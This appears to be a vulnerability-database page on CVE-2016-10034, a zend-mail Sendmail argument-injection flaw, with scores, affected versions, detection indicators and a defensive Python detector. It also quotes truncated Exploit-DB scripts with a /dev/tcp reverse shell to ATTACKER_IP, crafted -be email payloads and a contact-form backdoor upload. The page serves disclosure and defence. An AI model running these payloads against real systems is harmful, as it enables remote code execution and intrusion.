CVE-2016-10034
Published 2016-12-30
Priority P2 · 75 · critical · 9.8 (CVSS 3.0)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT · EPSS 38.44% (98.4th percentile)
The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address.
Affected (14 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zend | zend-mail | <= 2.4.10 | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend-mail | — | — |
| zend | zend_framework | <= 2.4.10 | — |
| zendframework | zend-mail | >= 0 < 2.4.11 | 2.4.11 |
| zendframework | zend-mail | 2.5 – 2.5.2 | — |
| zendframework | zend-mail | 2.6 – 2.6.2 | — |
| zendframework | zend-mail | >= 2.7 < 2.7.2 | 2.7.2 |
Detection & IOCs (extracted from sources)
- Detect email addresses containing backslash-doublequote sequences (\") in the From/sender field, which are used to inject extra parameters into the sendmail command.
- Monitor for sendmail/mail process invocations that include flags such as -oQ or -X (log file path injection), which indicate successful parameter injection from a crafted From address.
- Look for outbound /dev/tcp reverse shell connections spawned from web server processes (e.g., apache, php-fpm), which are the final stage of the exploit chain.
- Inspect contact/registration form submissions for email field values containing backslash, double-quote, and flag-like strings (e.g., -oQ, -X, -be) as indicators of injection attempts.
- The vulnerability is triggered via the setFrom() function in the Zend-Mail Sendmail adapter; audit all call sites of setFrom() for unsanitized user-controlled input.
- The vulnerability only affects the Sendmail transport adapter in zend-mail; other transports (SMTP, etc.) are not impacted. Ensure the Sendmail adapter is actually in use before prioritising this CVE.
- Fixed versions are zend-mail >= 2.4.11 and >= 2.7.2, and Zend Framework >= 2.4.11. Detections targeting process arguments are only relevant on unpatched instances.
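The form-field and process-argument checks from the list above, written out as detection logic in Python. This is an added example, not code from any of the sources on this page or from the zend-mail project. The flag tokens -oQ, -X and -be and the backslash-doublequote indicator come from the list above; the sample form submissions and the sendmail argv are constructed for the example. A single double quote in a local part is legal (quoted local parts exist), so the high-confidence rule requires the escaped quote together with a flag-like token, and the lone indicators are reported separately for triage.

```python
import re
from typing import Dict, List, Tuple

# Sendmail flags named in the Detection & IOCs list above. A web application's mail
# transport has no reason to pass -oQ (queue directory), -X (log file) or -be.
SUSPICIOUS_FLAGS = ("-oQ", "-X", "-be")
FLAG_RE = re.compile(r"(?:^|\s)(-oQ|-X|-be)(?=\s|/|$)")


def email_indicators(value: str) -> List[str]:
    """Return the injection indicators present in a submitted email / From value."""
    found: List[str] = []
    if '\\"' in value:
        # backslash-doublequote: breaks out of the quoted local part "..."@domain
        found.append("backslash-doublequote")
    elif "\\" in value:
        found.append("backslash")
    if '"' in value:
        found.append("double-quote")
    if FLAG_RE.search(value):
        found.append("flag-like")
    return found


def is_injection_attempt(value: str) -> bool:
    """High-confidence rule: escaped quote plus a sendmail flag token in one address."""
    ind = email_indicators(value)
    return "backslash-doublequote" in ind and "flag-like" in ind


def scan_submissions(rows: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Report every form submission whose email field carries at least one indicator."""
    report = []
    for row in rows:
        ind = email_indicators(row.get("email", ""))
        if ind:
            report.append((row["email"], ind))
    return report


def sendmail_argv_indicators(argv: List[str]) -> List[str]:
    """Arguments of a sendmail/mail process that indicate a successful injection.

    Meant to run over process-creation telemetry (auditd, EDR) on unpatched hosts;
    -f<sender> is normal for a mail transport and is deliberately not flagged.
    """
    return [a for a in argv if a.startswith(SUSPICIOUS_FLAGS)]


# Constructed sample form submissions (not real data).
SUBMISSIONS: List[Dict[str, str]] = [
    {"name": "Jane Doe", "email": "jane.doe@example.com"},
    {"name": "O'Brien", "email": "\"o'brien\"@example.com"},          # legal quoted local part
    {"name": "x", "email": '"jdoe\\" -oQ/tmp -X/tmp/mail.log "@example.com'},
]

# Constructed sendmail argv as it would appear after a successful injection (not real data).
SAMPLE_ARGV: List[str] = [
    "/usr/sbin/sendmail", "-t", "-i", "-fjdoe", "-oQ/tmp", "-X/tmp/mail.log",
]


if __name__ == "__main__":
    for email, ind in scan_submissions(SUBMISSIONS):
        print(f"{email!r}: indicators={ind} attempt={is_injection_attempt(email)}")
    print("suspicious sendmail args:", sendmail_argv_indicators(SAMPLE_ARGV))
```

Running the block reports the O'Brien address with only the double-quote indicator (low confidence) and the third address as a high-confidence attempt; the argv check flags the two injected flags and leaves -t, -i and -fjdoe alone.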
CVSS provenance
NVD v3.0: 9.8 CRITICAL · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
OSV · 2022-05-14
CVE-2016-10034 [CRITICAL] zend-mail remote code execution via Sendmail adapter
GHSA · 2022-05-14
CVE-2016-10034 [CRITICAL] CWE-77 zend-mail remote code execution via Sendmail adapter
No detection rules found.
Exploit-DB · 2017-06-21 · CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
PHPMailer 2):
print "No such target. Exiting\n"
exit(3)
################################
# Payload
################################
cmd = "/bin/bash -c '0/dev/tcp/%s/%s;nohup sh &196 2>&196 &'" % (args.ATTACKER_IP, args.ATTACKER_PORT)
prepared_cmd = prepare_cmd(cmd)
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)
if target == 2:
payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"
################################
# Attack episode
# This step will execute the reverse shell
################################
# Form fields
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}
# Print relevant information
print "\n[
Exploit-DB · 2017-01-02 · CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
PHPMailer 4):
print "No such target. Exiting\n"
exit(3)
if target == 1:
# PHPMailer "
RCE_PHP_CODE = """/dev/tcp/%s/%s 0&1' "); ?>""" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT)
# The form names might need to be adjusted
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: RCE_PHP_CODE}
# Attack
# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor
print "[+] Backdoor upload via the contact form at '%s'\n" % CONTACT_SCRIPT_URL
data = urllib.urlencode(post_fields)
req = urllib2.Request(CONTACT_SCRIPT_URL, data)
response = urllib2.urlopen(req)
the_page = response.read()
# Check if the backdoor was uploaded correctly.
# A little trick here. The urlopen s
Exploit-DB · 2016-12-30 · CVSS 9.8
CVE-2016-10034 [CRITICAL] Zend Framework / zend-mail < 2.4.11 - Remote Code Execution
Zend Framework / zend-mail
09607 array(
'autoregister_zf' => true
)
));
Zend\Mvc\Application::init(require 'config/application.php')->run();
$message = new \Zend\Mail\Message();
$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');
$transport = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);
?>
HackerOne · 2017-06-21 · CVSS 9.8
[CRITICAL] Directory Disclose, Email Disclose Zendmail vulnerability
I found three vulnerabilities:
Directory information disclosure, email address disclosure, and possible remote code execution in Zendmail.
During signup your code accepts usernames containing ', ", / and @, while all of these special characters must be forbidden or encoded in usernames.
Directory Disclose:
1. Go to the sign-up page and create an account with a username containing a double quote, such as as"
2. Sign in, go to your account and add an email address, then log out.
3. Go to the Forgot-Password section and enter the username from above (as").
4. See that the full path of the server has been disclosed (screenshot: directory.png).
Email address Disclose:
If you look closely at the screenshot below, the email address of the user is also disclosed.
Zendmail rce:
From the above screenshot, you are using zendmail f
Bugzilla · 2017-01-02 · CVSS 9.8
CVE-2016-10034 [CRITICAL] php-zendframework-zend-mail: php-zendframework: Parameter injection in setFrom() function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue
Bugzilla · 2017-01-02 · CVSS 9.8
CVE-2016-10034 [CRITICAL] php-ZendFramework: Parameter injection in setFrom() function [fedora-all]
Bugzilla · 2017-01-02 · CVSS 9.8
CVE-2016-10034 [CRITICAL] php-ZendFramework: Parameter injection in setFrom() function [epel-all]
Bugzilla · 2017-01-02 · CVSS 9.8
CVE-2016-10034 [CRITICAL] php-ZendFramework2: php-zendframework: Parameter injection in setFrom() function [epel-all]
Bugzilla · 2017-01-02 · CVSS 9.8
CVE-2016-10034 [CRITICAL] php-zendframework: Parameter injection in setFrom() function
The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address.
References:
http://seclists.org/oss-sec/2016/q4/780
http://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html
Discussion:
Created php-zendframework-zend-mail tracking bugs for this issue:
Affects: fedora-all [bug 1409593]
---
Created php-ZendFramework2 tracking bugs for this issue:
Affects: epel-all [bug 1409594]
---
Created p
References:
http://www.securityfocus.com/bid/95144
http://www.securitytracker.com/id/1037539
https://framework.zend.com/security/advisory/ZF2016-04
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html
https://security.gentoo.org/glsa/201804-10
https://www.exploit-db.com/exploits/40979/
https://www.exploit-db.com/exploits/40986/
https://www.exploit-db.com/exploits/42221/